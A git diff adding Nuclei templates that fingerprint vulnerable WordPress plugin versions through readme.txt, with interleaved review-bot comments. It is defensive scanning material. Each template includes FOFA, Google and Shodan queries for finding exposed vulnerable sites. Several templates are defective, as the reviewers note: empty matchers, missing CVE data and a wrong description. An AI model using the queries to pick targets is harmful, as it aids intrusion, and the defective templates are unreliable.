shodan-query: 'vuln:CVE-2024-9863' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file 
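Review bot: The `description` opens with "The UserPro plugin for WordPress", while `name`, the request path and the word matcher all target Miniorange OTP Verification with Firebase (`miniorange-firebase-sms-otp-verification`). One of the two is wrong, and as written a finding from this template can be attributed to the wrong plugin during triage. The text looks carried over from a different advisory and should be checked against the linked Wordfence entry. If the slug is the correct one, the description should start `The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to privilege escalation ...`.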
diff --git a/poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml b/poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml
new file mode 100644
index 0000000000..4c840af352
--- /dev/null
+++ b/poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b + +info: + name: > + Add Widget After Content <= 2.4.6 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Add Widget After Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e02472a8-5b88-43ad-86f3-e890b49899ad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9892 + metadata: + fofa-query: "wp-content/plugins/add-widget-after-content/" + google-query: inurl:"/wp-content/plugins/add-widget-after-content/" + shodan-query: 'vuln:CVE-2024-9892' + tags: cve,wordpress,wp-plugin,add-widget-after-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/add-widget-after-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "add-widget-after-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.6') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9898.yaml b/poc/cve/CVE-2024-9898.yaml new file mode 100644 index 0000000000..65b5507352 --- /dev/null +++ b/poc/cve/CVE-2024-9898.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9898 + +info: + name: > + Parallax Image <= 1.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via dd-parallax Shortcode + author: topscoder + severity: low + description: > + The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dd-parallax shortcode in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/57641366-85d3-4375-8cde-041227c9f811?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9898 + metadata: + fofa-query: "wp-content/plugins/parallax-image/" + google-query: inurl:"/wp-content/plugins/parallax-image/" + shodan-query: 'vuln:CVE-2024-9898' + tags: cve,wordpress,wp-plugin,parallax-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/parallax-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "parallax-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9940.yaml b/poc/cve/CVE-2024-9940.yaml new file mode 100644 index 0000000000..bd309b8455 --- /dev/null +++ b/poc/cve/CVE-2024-9940.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9940 + +info: + name: > + Calculated Fields Form <= 5.2.45 - HTML Injection + author: topscoder + severity: medium + description: > + The Calculated Fields Form plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 5.2.45. This is due to the plugin not properly neutralizing HTML elements from submitted forms. This makes it possible for unauthenticated attackers to inject arbitrary HTML that will render when the administrator views form submissions in their email. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e2c9f6a5-8698-4452-bf0a-c1d796b2fdad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-9940 + metadata: + fofa-query: "wp-content/plugins/calculated-fields-form/" + google-query: inurl:"/wp-content/plugins/calculated-fields-form/" + shodan-query: 'vuln:CVE-2024-9940' + tags: cve,wordpress,wp-plugin,calculated-fields-form,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/calculated-fields-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "calculated-fields-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.45') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9951.yaml b/poc/cve/CVE-2024-9951.yaml new file mode 100644 index 0000000000..c1d29ad484 --- /dev/null 
+++ b/poc/cve/CVE-2024-9951.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9951 + +info: + name: > + Wordpress Photo Album Plus <= 8.8.05.003 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Photo Album Plus plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wppa-tab' parameter in all versions up to, and including, 8.8.05.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a4f0c06-db88-4950-b1f5-b2aab480c974?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9951 + metadata: + fofa-query: "wp-content/plugins/wp-photo-album-plus/" + google-query: inurl:"/wp-content/plugins/wp-photo-album-plus/" + shodan-query: 'vuln:CVE-2024-9951' + tags: cve,wordpress,wp-plugin,wp-photo-album-plus,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-photo-album-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-photo-album-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.8.05.003') \ No newline at end of file diff --git a/poc/debug/strut-debug-mode.yaml b/poc/debug/strut-debug-mode.yaml new file mode 100644 index 0000000000..ade1eefb66 --- /dev/null +++ b/poc/debug/strut-debug-mode.yaml 
@@ -0,0 +1,16 @@ +id: struts-debug-mode +info: + name: Apache Struts setup in Debug-Mode + author: pdteam + severity: low + tags: logs,struts,apache,exposure,setup +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "" + - "" + condition: and diff --git a/poc/microsoft/miniorange-firebase-sms-otp-verification.yaml b/poc/microsoft/miniorange-firebase-sms-otp-verification.yaml new file mode 100644 index 0000000000..7c31aadb85 --- /dev/null +++ b/poc/microsoft/miniorange-firebase-sms-otp-verification.yaml @@ -0,0 +1,59 @@ +id: miniorange-firebase-sms-otp-verification + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file 
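Review bot: Both entries under `words` are empty strings as shown here, and with `condition: and` an empty word is contained in any response body, so this matcher would flag every host it is run against. If the intended debug-mode markers were lost when the file was copied or rendered, they need to be restored and quoted; until then the template produces only false positives. Two smaller points in the same hunk: the file is named `strut-debug-mode.yaml` while the `id` is `struts-debug-mode`, and it uses the older `requests:` key where the other templates in this commit use `http:`.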
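Review bot: In `poc/microsoft/miniorange-firebase-sms-otp-verification.yaml` the fields `description`, `cvss-metrics`, `cvss-score` and `cve-id` are empty and `shodan-query` is the bare string `'vuln:'`, yet the template is tagged `cve` and filed under `poc/microsoft/` although it targets a WordPress plugin. Its Wordfence advisory id (`04045ec3-dd8e-4ac5-bd73-eef6205ecc62`) is the one referenced by `poc/cve/CVE-2024-9861.yaml` in this commit, so either fill the fields from that file (`cve-id: CVE-2024-9861`) or drop this copy as a duplicate. A result from it carries no score or CVE for triage and repeats the finding already reported by the CVE template. The templates added under `poc/other/` in this commit (add-widget-after-content through elemenda) show the same empty `classification` and `'vuln:'` query.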
diff --git a/poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml b/poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml new file mode 100644 index 0000000000..17ec589a58 --- /dev/null +++ b/poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml @@ -0,0 +1,59 @@ +id: add-widget-after-content-d85568da3687a3e685b0444c220ceb6e + +info: + name: > + Add Widget After Content <= 2.4.6 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e02472a8-5b88-43ad-86f3-e890b49899ad?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/add-widget-after-content/" + google-query: inurl:"/wp-content/plugins/add-widget-after-content/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,add-widget-after-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/add-widget-after-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "add-widget-after-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.6') \ No newline at end of file diff --git a/poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml b/poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml new file mode 100644 index 0000000000..0014040902 --- /dev/null +++ b/poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml 
@@ -0,0 +1,59 @@ +id: advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4 + +info: + name: > + Advanced Category and Custom Taxonomy Image <= 1.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via ad_tax_image Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/advanced-category-and-custom-taxonomy-image/" + google-query: inurl:"/wp-content/plugins/advanced-category-and-custom-taxonomy-image/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,advanced-category-and-custom-taxonomy-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-category-and-custom-taxonomy-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-category-and-custom-taxonomy-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml b/poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml new file mode 100644 index 0000000000..a4794843e7 --- /dev/null +++ b/poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml 
@@ -0,0 +1,59 @@ +id: arconix-shortcodes-6211e427613ea6a179193b7355acf836 + +info: + name: > + Arconix Shortcodes <= 2.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef395956-477c-4970-becd-4f437e4807a3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml b/poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml new file mode 100644 index 0000000000..8528d44eb1 --- /dev/null +++ b/poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml 
@@ -0,0 +1,59 @@ +id: branding-bb37f6417503b5ce748656e458facde1 + +info: + name: > + Branding <= 1.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/branding/" + google-query: inurl:"/wp-content/plugins/branding/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,branding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/branding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "branding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml b/poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml new file mode 100644 index 0000000000..c8d26d03c4 --- /dev/null +++ b/poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml 
@@ -0,0 +1,59 @@ +id: bulk-image-resizer-b562d45258ab161721689720617accce + +info: + name: > + Bulk images optimizer: Resize, optimize, convert to webp, rename ... <= 2.0.1 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a189e436-e8af-4379-aa6e-2d1a4a2d4bfa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bulk-image-resizer/" + google-query: inurl:"/wp-content/plugins/bulk-image-resizer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bulk-image-resizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bulk-image-resizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bulk-image-resizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/poc/other/create-flipbook-from-pdf.yaml b/poc/other/create-flipbook-from-pdf.yaml new file mode 100644 index 0000000000..f5f2fe6dd2 --- /dev/null +++ b/poc/other/create-flipbook-from-pdf.yaml 
@@ -0,0 +1,59 @@ +id: create-flipbook-from-pdf + +info: + name: > + Creates 3D Flipbook, PDF Flipbook <= 1.2 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b5c8733-7396-4ae5-862d-15db370dbdd7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/create-flipbook-from-pdf/" + google-query: inurl:"/wp-content/plugins/create-flipbook-from-pdf/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,create-flipbook-from-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/create-flipbook-from-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "create-flipbook-from-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml b/poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml new file mode 100644 index 0000000000..c74edc1ac1 --- /dev/null +++ b/poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml 
@@ -0,0 +1,59 @@ +id: debrandify-af092808d29c61cc63a89aeb529b32ca + +info: + name: > + Debrandify · Remove or Replace WordPress Branding <= 1.1.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/debrandify/" + google-query: inurl:"/wp-content/plugins/debrandify/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,debrandify,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/debrandify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "debrandify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/other/disc-golf-manager.yaml b/poc/other/disc-golf-manager.yaml new file mode 100644 index 0000000000..6de7ecffcd --- /dev/null +++ b/poc/other/disc-golf-manager.yaml 
@@ -0,0 +1,59 @@ +id: disc-golf-manager + +info: + name: > + Disc Golf Manager <= 1.0.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf85ddc7-cb90-4502-9936-f2c51030b4a6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/disc-golf-manager/" + google-query: inurl:"/wp-content/plugins/disc-golf-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,disc-golf-manager,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/disc-golf-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "disc-golf-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml b/poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml new file mode 100644 index 0000000000..0468f69bd4 --- /dev/null +++ b/poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml 
@@ -0,0 +1,59 @@ +id: easy-post-types-41dccfb17f0433d3add9d08a47570aa1 + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d038f1a2-4755-417f-965d-508b57c05738?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml b/poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml new file mode 100644 index 0000000000..8f58ddad05 --- /dev/null +++ b/poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml 
@@ -0,0 +1,59 @@ +id: easy-post-types-422d4e69ffd0199ede6b487dc4d39805 + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml b/poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml new file mode 100644 index 0000000000..30ef9e58f9 --- /dev/null +++ b/poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml 
@@ -0,0 +1,59 @@ +id: easy-post-types-681e1b321c3a1aa369c7bb180213815e + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Meta + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml b/poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml new file mode 100644 index 0000000000..7aea3c5298 --- /dev/null +++ b/poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml 
@@ -0,0 +1,59 @@ +id: elemenda-36540ed00b00575eb872e13e9900b7cd + +info: + name: > + Elemenda <= 0.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/elemenda/" + google-query: inurl:"/wp-content/plugins/elemenda/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,elemenda,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elemenda/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elemenda" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.0.2') \ No newline at end of file diff --git a/poc/other/event-calendars.yaml b/poc/other/event-calendars.yaml new file mode 100644 index 0000000000..527850289c --- /dev/null +++ b/poc/other/event-calendars.yaml 
